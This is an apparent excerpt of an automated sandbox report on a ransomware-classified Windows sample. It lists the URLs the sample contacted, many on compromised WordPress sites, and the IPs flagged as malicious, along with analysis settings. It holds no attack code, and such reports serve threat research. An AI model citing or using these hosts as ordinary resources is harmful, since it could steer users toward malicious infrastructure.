                                                                                                        https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/css/owl.theme.default.min.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crl.godaddy.com/gdigtS9P6wPz9x.exe, 00000000.00000003.532898674.0000000000BE5000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://thewellnessmimi.com/content/images/oxvcjy.jpgtS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://decoder.re/tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://idemblogs.com/tS9P6wPz9x.exe, 00000000.00000002.596864356.0000000000B4A000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/favicon/favicon.pngtS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://withahmed.com/uploads/game/snzazo.jpgtS9P6wPz9x.exe, 00000000.00000003.494503060.0000000000C0F000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.instagram.com/maratonadelisboa/tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://you-bysia.com.au/uploads/graphic/femvpu.pngtS9P6wPz9x.exe, 00000000.00000002.597178188.0000000000B7E000.00000004.00000020.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.boldgrid.com/w3-total-cache/tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://youbysia.com.au/wp-content/themes/youbysia/css/youtubecss.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://manifestinglab.com/news/tmp/pakc.jpgCtS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://youbysia.com.au/by-laser-treatment/skin-treatments/signature-sonic-facial/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://tulsawaterheaterinstallation.com/news/image/rf.jpgtS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://youbysia.com.au/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyoubysia.com.au%2F&#038;format=xmtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://kmbshipping.co.uk/admin/pics/xukxqlujcu.giftS9P6wPz9x.exe, 00000000.00000002.597178188.0000000000B7E000.00000004.00000020.sdmp, tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://cps.letsencrypt.org0tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://www.asgestion.com/comments/feed/tS9P6wPz9x.exe, 00000000.00000003.459057587.0000000000C10000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://huehnerauge-entfernen.de/wp-content/themes/rainforest/style.css?ver=5.6.1tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://truenyc.co/feed/tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://youbysia.com.au/by-laser-treatment/laser-treatment/laser-hair-removal/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://youbysia.com.au/wp-content/uploads/2020/11/Coz-beauty-magazine.pngtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://narcert.com/comments/feed/tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://youbysia.com.au/contact-us/laser-skin-clinic-sydney-cbd/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://humancondition.com/include/assets/fkyihxilog.giftS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.365questions.org/wp-content/plugins/cleantalk-spam-protect/js/cleantalk_nocache.min.js?vtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://youbysia.com.au/acne-blackheads-breakout/tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://gmpg.org/xfn/11tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.517359060.00000000038FC000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://youbysia.com.au/by-laser-treatment/laser-treatment/laser-perfecting-lift/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://youbysia.com.au/wp-content/themes/youbysia/js/jquery.min.js?ver=1tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://open.spotify.com/episode/2z7qIfZlCzb04pemsS18kRtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://manifestinglab.com:443/news/tmp/pakc.jpgtS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://latribuessentielle.com/?s=tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.binder-buerotechnik.at/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.8tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://staging.you-bysia.com.au/about-us/#our-teamtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://narcert.com/uploads/image/burgajaobu.pngifhtS9P6wPz9x.exe, 00000000.00000003.468434175.0000000000B89000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://youbysia.com.au/by-skin-condition/dry-dehydrated-skin/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://you-by-sia.myshopify.com/products/starter-packtS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.cosbeauty.com.au/magazines/cosbeauty-magazine-88/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.trulynolen.co.uk/resources/truly-nolen-og.jpgtS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://youbysia.com.au/wp-content/uploads/2020/09/Sia-Hendry-podcast-LAser-Facial-Treatments.jpgtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://youbysia.com.au/wp-content/uploads/2020/07/1.jpgtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://r3.o.lencr.orgtS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://schema.org/BreadcrumbListtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://mailchi.mp/a586a5225aac/get-summer-ready-bodytS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://youbysia.com.au/by-laser-treatment/skin-treatments/inside-out-peel/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://certs.starfieldtech.com/repository/0tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/css/special-slider.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.365questions.org/wp-content/plugins/cleantalk-spam-protect/js/apbct-public.min.js?ver=5.tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://menexa4papers.trade/tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.binder-buerotechnik.at/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.autS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.au/promotiontS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.au/wp-content/uploads/2020/07/afterpay.pngtS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.au/by-skin-condition/unwanted-hair/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://bbsmobler.se/W:StS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://dontpassthepepper.com/wp-content/tmp/mitn.jpgttS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://bbylegacy.com/tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://you-by-sia.myshopify.com/collections/cleanserstS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://you-bysia.com.au:443/uploads/graphic/femvpu.pngtS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.au/wp-content/themes/youbysia/css/bootstrap.min.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://digivod.de/wp-includes/css/dist/block-library/style.min.css?ver=5.6.1tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://narcert.comtS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.au/wp-content/uploads/2020/06/1.pngtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.365questions.org/wp-json/tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.maratonaclubedeportugal.com/wp-includes/css/dist/block-library/style.min.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://huehnerauge-entfernen.de/comments/feed/tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/js/special-slider.jstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://365questions.org/tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-180x180.pngtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://youbysia.com.au/by-treatment/skin-treatments/tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://secureservercdn.nettS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://huehnerauge-entfernen.de/tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.binder-buerotechnik.at/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-270x270.pngtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://bookings.gettimely.com/youbysia/booktS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/fonts/avenir/style.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://digivod.de/feed/tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://narcert.com/feed/tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://youbysia.com.au/body-toning/tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://bbsmobler.se:443/static/assets/ugdl.pngtS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://youbysia.com.au/wp-content/themes/youbysia/css/owl.carousel.min.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://huehnerauge-entfernen.de/wp-content/plugins/tablepress/css/default.min.css?ver=1.12tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://nsec.se/data/image/od.pngtS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://youbysia.com.au/by-skin-condition/stretch-marks-removal/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.youtube.com/user/youbysiatS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                              		high

                                                                                                                              Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              85.234.145.174
                                                                                                                              		unknownUnited Kingdom
                                                                                                                              		29550SIMPLYTRANSITGBtrue
                                                                                                                              185.2.4.64
                                                                                                                              		unknownItaly
                                                                                                                              		203461REGISTER_UK-ASGBtrue
                                                                                                                              136.243.147.81
                                                                                                                              		unknownGermany
                                                                                                                              		24940HETZNER-ASDEtrue
                                                                                                                              52.29.252.113
                                                                                                                              		unknownUnited States
                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                              184.168.131.241
                                                                                                                              		unknownUnited States
                                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                              155.133.142.13
                                                                                                                              		unknownFrance
                                                                                                                              		203476GANDI-AS-2Domainnameregistrar-httpwwwgandinetFRtrue
                                                                                                                              142.93.110.250
                                                                                                                              		unknownUnited States
                                                                                                                              		14061DIGITALOCEAN-ASNUStrue
                                                                                                                              89.46.91.28
                                                                                                                              		unknownSpain
                                                                                                                              		2914NTT-COMMUNICATIONS-2914UStrue
                                                                                                                              13.74.136.93
                                                                                                                              		unknownUnited States
                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                              87.230.41.243
                                                                                                                              		unknownGermany
                                                                                                                              		35329GD-EMEA-DC-CGN3DEtrue
                                                                                                                              159.69.118.212
                                                                                                                              		unknownGermany
                                                                                                                              		24940HETZNER-ASDEtrue
                                                                                                                              85.119.82.125
                                                                                                                              		unknownUnited Kingdom
                                                                                                                              		8943JUMPGBtrue
                                                                                                                              116.90.53.15
                                                                                                                              		unknownAustralia
                                                                                                                              		55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUtrue
                                                                                                                              188.165.53.185
                                                                                                                              		unknownFrance
                                                                                                                              		16276OVHFRtrue
                                                                                                                              178.250.15.192
                                                                                                                              		unknownGermany
                                                                                                                              		34432PHH-ASDEtrue
                                                                                                                              74.220.215.94
                                                                                                                              		unknownUnited States
                                                                                                                              		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                              94.16.115.81
                                                                                                                              		unknownGermany
                                                                                                                              		197540NETCUP-ASnetcupGmbHDEtrue
                                                                                                                              91.121.58.131
                                                                                                                              		unknownFrance
                                                                                                                              		16276OVHFRtrue
                                                                                                                              185.107.227.241
                                                                                                                              		unknownNetherlands
                                                                                                                              		202861PCEXTREME-EStrue
                                                                                                                              198.12.145.239
                                                                                                                              		unknownUnited States
                                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                              46.30.215.215
                                                                                                                              		unknownDenmark
                                                                                                                              		51468ONECOMDKtrue
                                                                                                                              91.195.240.117
                                                                                                                              		unknownGermany
                                                                                                                              		47846SEDO-ASDEtrue
                                                                                                                              172.67.222.33
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                              79.137.75.185
                                                                                                                              		unknownFrance
                                                                                                                              		16276OVHFRtrue
                                                                                                                              83.166.155.153
                                                                                                                              		unknownSwitzerland
                                                                                                                              		29222INFOMANIAK-ASCHtrue
                                                                                                                              35.221.46.9
                                                                                                                              		unknownUnited States
                                                                                                                              		15169GOOGLEUStrue
                                                                                                                              77.72.5.145
                                                                                                                              		unknownUnited Kingdom
                                                                                                                              		12488KRYSTALGRtrue
                                                                                                                              151.139.128.10
                                                                                                                              		unknownUnited States
                                                                                                                              		20446HIGHWINDS3UStrue
                                                                                                                              104.26.13.9
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                              185.98.131.150
                                                                                                                              		unknownFrance
                                                                                                                              		16347RMI-FITECHFRtrue
                                                                                                                              104.21.9.188
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                              166.62.110.232
                                                                                                                              		unknownUnited States
                                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                              104.21.78.13
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                              91.201.60.54
                                                                                                                              		unknownSweden
                                                                                                                              		44136ASODERLANDSEtrue
                                                                                                                              144.76.225.204
                                                                                                                              		unknownGermany
                                                                                                                              		24940HETZNER-ASDEtrue
                                                                                                                              66.155.35.240
                                                                                                                              		unknownCanada
                                                                                                                              		13768COGECO-PEER1CAtrue
                                                                                                                              184.175.106.113
                                                                                                                              		unknownUnited States
                                                                                                                              		7393CYBERCONUStrue

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.1

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                              Analysis ID:353325
                                                                                                                              Start date:16.02.2021
                                                                                                                              Start time:04:28:38
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 6m 53s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Sample file name:tS9P6wPz9x (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:37
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.rans.evad.winEXE@2/2@46/38
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 99.3% (good quality ratio 95.4%)
                                                                                                                              • Quality average: 86.6%
                                                                                                                              • Quality standard deviation: 25.1%
                                                                                                                              HCA Information:Failed
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              Show All
                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 51.11.168.160, 23.218.208.56, 92.122.213.194, 92.122.213.247, 20.54.26.129, 8.248.123.254, 8.253.208.113, 8.248.113.254, 8.248.97.254, 8.248.135.254, 51.104.139.180, 52.155.217.156
                                                                                                                              • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              04:31:24API Interceptor36x Sleep call for process: tS9P6wPz9x.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
